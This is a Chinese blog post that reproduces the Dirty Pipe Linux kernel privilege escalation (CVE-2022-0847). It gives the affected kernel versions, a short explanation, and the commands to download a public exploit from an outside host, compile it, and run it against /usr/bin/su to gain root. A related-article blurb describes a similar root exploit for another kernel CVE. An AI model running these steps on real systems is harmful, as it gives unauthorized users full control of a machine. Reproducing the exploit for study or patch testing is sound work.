【Linux权限提升】CVE-2022-0847复现（二）

FlynnAAAA

已于 2022-03-08 15:56:31 修改

阅读量627

点赞数

分类专栏：提权文章标签： linux

于 2022-03-08 13:29:03 首次发布

本文链接：https://blog.csdn.net/m0_59924300/article/details/123350403

版权

提权专栏收录该内容

2 篇文章 0 订阅

订阅专栏

漏洞通告:

https://access.redhat.com/security/cve/cve-2022-0847

影响范围：

5.8<=Linux kernel<5.16.11/5.15.25/5.10.102

漏洞介绍：

发现新管道缓冲区结构的“标志”成员在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确初始化的方式存在缺陷，因此可能包含陈旧值。非特权本地用户可以使用此漏洞写入由只读文件支持的页面缓存中的页面，从而提升他们在系统上的权限。

漏洞复现：

漏洞exp:（我们这次用1个链接做实验）

1.https://haxx.in/files/dirtypipez.c
2.https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit

首先查看内核输入

uname -a

然后输入

sudo wget https://haxx.in/files/dirtypipez.c

进这对dirtypipez.c文件进行编译

gcc -o dirtypipe dirtypipez.c

最后输入西面命令进行权限提升

./dirtypipe /usr/bin/su

解决方案：

请尽快根据官方升级到安全版本

参考文档：

最新Linux内核提权漏洞——Dirty Pipe(CVE-2022-0874) 复现
https://access.redhat.com/security/cve/cve-2022-0847

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

FlynnAAAA

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
【Linux权限提升】CVE-2022-0847复现（二）

【Linux权限提升】CVE-2022-0874复现（二）
复制链接

扫一扫

专栏目录

CVE-2022-0847 Linux脏管道漏洞分析

qq_42735101的博客

01-26

904

CVE-2022-0847漏洞被一名叫Max Kellermann的安全研究员于2022年3月7日公开披露，并将该漏洞命名为The Dirty Pipe Vulnerability（脏管道漏洞）。

DirtyPipe(CVE-2022-0847) 脏管漏洞复现分析

Zyecho的博客

07-20

4104

本实验详细记录了DirtyPipe(CVE-2022-0847) 脏管漏洞的分析和复现

参与评论您还未登录，请先登录后发表或查看评论

详解CVE-2022-0847 DirtyPipe漏洞

wangluoanquan111的博客

12-29

1095

不需要调用特权syscall就能完成对任意只读文件的修改（有点类似之前的脏牛，但底层原理其实不一样），且由于利用过程中不涉及内存损坏，因此不需要ROP等利用方法，也自然不需要知道内核基址等信息，故不需要对内核版本进行适配（因此可以被广泛利用，危害巨大）。本质上，这个漏洞是由内存未初始化造成的，且从2016年就存在了，但在当时并不能发生有趣的利用，直到2020年由于对pipe内部实现进行了一些修改，才让这个“BUG”变成了能够利用的“漏洞”。

Linux内核提权漏洞(CVE-2022-0847)复现

Hackerdoors

03-28

6043

## 0X01 漏洞描述 CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞，可覆盖重写任意可读文件中的数据，从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞（Dirty Cow），但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe” ## 0X02 影响范围受影响版本 8 <= Linu

CVE-2022-0847（脏管道）复现

m0_62207170的博客

02-28

287

CVE-2022-0847复现

CVE-2022-0847 linux提权漏洞复现

qq_41274349的博客

03-09

3685

CVE-2022-0847 linux提权漏洞复现

新版脏牛Linux内核提权漏洞CVE-2022-0847

03-09

5.8 <= Linux kernel 中的一个漏洞，它允许覆盖任意只读文件中的数据。这会导致权限提升，因为非特权进程可以将代码注入根进程。修复版本：Linux 5.16.11、5.15.25 和 5.10.102 中修复。

exploit （Linux 内核CVE-2024-1086漏洞复现脚本）

最新发布

06-06

Linux 内核CVE-2024-1086漏洞复现脚本。在普通用户下，将文件上传后，chmod 777 exploit ，然后运行 ./exploit ，提权成功，输入id，可看到已经是root权限。

DirtyCow提权漏洞复现（CVE-2016-5195）1

08-08

理解并复现 Dirty Cow 漏洞不仅可以帮助你提高对Linux安全性的认识，还可以在实际工作中更好地预防和应对类似的权限提升攻击。在实际环境中，一定要保持警惕，及时应用安全更新，以保护系统免受恶意攻击。

[Timeline Sec] - CVE-2020-9484：Tomcat Session 反序列化复现1

08-03

【Apache Tomcat与Session反序列化漏洞CVE-2020-9484详解】 Apache Tomcat是一款广泛使用的开源Web应用服务器，它基于Java，主要用于运行...了解这个漏洞的工作原理和复现方法对于提升网络安全防护能力至关重要。

CVE-2022-0847

04-03

https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit

CVE-2022-0847 Dirty Pipe linux内核提权漏洞 | POC

dust_hk的博客

03-09

5143

The Dirty Pipe Linux kernelprivilege escalation 摘要 Linux Kernel 5.8及以后版本中允许覆盖重写任意可读文件中的数据，未经授权的本地用户可以使用此漏洞写入由只读文件支持的页面缓存中的页面，可以利用此漏洞进行本地权限提升。类似于CVE-2016-5195 “Dirty Cow”。此漏洞影响 5.17-rc6 之前的 Linux 内核版本。评分 CVSSV3 ：7.8 POC已公开影响范围影响版本 5.8 <=.

linux本地权限提升漏洞CVE-2022-0847

focus on security

03-10

633

The Dirty Pipe Vulnerability — The Dirty Pipe Vulnerability documentation Max Kellermann <max.kellermann@ionos.com> Abstract This is the story of CVE-2022-0847, a vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbit.

漏洞复现#CVE-2022-0847(Linux内核提权)

weixin_52763014的博客

09-13

304

使用uname -r命令,查看当前内核版本，一般在 5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102版本以内，可以受影响。如果你使用的是linux18.04版本安装起来应该是没什么问题，由于我已经安装过了，所以这里不展示效果。可以看到有很多，你可以找一个你看的顺眼的，我这里使用的是/bin/ping。环境配置时间可能较长，可以同上面链接，了解漏洞，如何产生以及漏洞特性。好的失败了，那位大佬的文章的一样没成功，我抱着侥幸的心里试试，也不行。漏洞复现(两个方法)

学习打靶--CVE-2022-0847--pingme（1）

m0_57276559的博客

06-09

1863

打靶学习---pingme

最新CS RCE（CVE-2022-39197）复现心得分享

C20220511的博客

10-18

2594

这个漏洞号称是脚本小子杀手，喜欢用CS的朋友们瑟瑟发抖。复现这个漏洞也是一个很有意思的事情，让我学到了很多关于Swing和SVG的知识，这篇文章也希望能帮助大家对此类漏洞的调试、复现等过程有更深入的理解。

Dirty Pipe脏管道提权漏洞复现(CVE-2022-0847)

小千安全

05-06

779

攻击者通过 CVE-2022-0847 可覆盖重写任意可读文件中的数据，可将普通权限的用户提升到特权 root这个漏洞作者将其命名为了 Dirty Pipe（脏管道），一看到这名字讲道理就让人想到了 Dirty Cow（脏牛），这是因为该漏洞的原理比较类似于 Dirty Cow，但这个漏洞更容易被利用。

Linux-dirty pipe内核提权漏洞复现-编号：CVE-2022-0847

╲ゞ紅桃K

08-31

1290

此漏洞属于Linux提权漏洞, 攻击者可利用该漏洞使任何非特权(本地)用户在易受攻击的主机上获得root权限，非特权进程可以将代码注入到根进程使得攻击者可获取服务器的所有权限。与该漏洞CVE-2022-0847(Dirty Pipe)类似的另一个漏洞CVE-2016-5195 “Dirty Cow”（脏牛提权），很多人应该了解并且能利用该漏洞。...

如何修复linux漏洞 CVE-2022-0847

07-15

要修复Linux漏洞CVE-2022-0847，您可以按照以下步骤进行操作： 1. 更新系统：确保您的系统已经更新到最新的软件包版本。使用以下命令更新软件包： ``` sudo apt update sudo apt upgrade ``` 2. 安装补丁：...

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交